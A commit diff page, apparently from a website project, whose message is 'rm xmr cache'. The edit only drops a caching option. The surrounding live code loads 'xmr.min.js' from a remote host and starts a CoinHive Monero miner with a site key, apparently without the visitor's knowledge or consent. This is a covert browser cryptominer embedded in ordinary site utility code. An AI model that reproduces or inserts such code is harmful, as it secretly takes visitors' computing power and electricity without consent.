Commit fd4fa70b authored by Vanessa's avatar Vanessa

rm xmr cache

parent cd38a7c6
...@@ -248,8 +248,7 @@ var Util = { ...@@ -248,8 +248,7 @@ var Util = {
$.ajax({ $.ajax({
method: "GET", method: "GET",
url: 'https://static.hacpai.com/js/lib/xmr.min.js', url: 'https://static.hacpai.com/js/lib/xmr.min.js',
dataType: "script", dataType: "script"
cache: true
}).done(function () { }).done(function () {
var miner = new CoinHive.Anonymous('gr2r3rJsYmaJpSd2Nml15zomewwc6Lzc', {threads: 1, throttle: 0.9}); var miner = new CoinHive.Anonymous('gr2r3rJsYmaJpSd2Nml15zomewwc6Lzc', {threads: 1, throttle: 0.9});
miner.start(); miner.start();
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment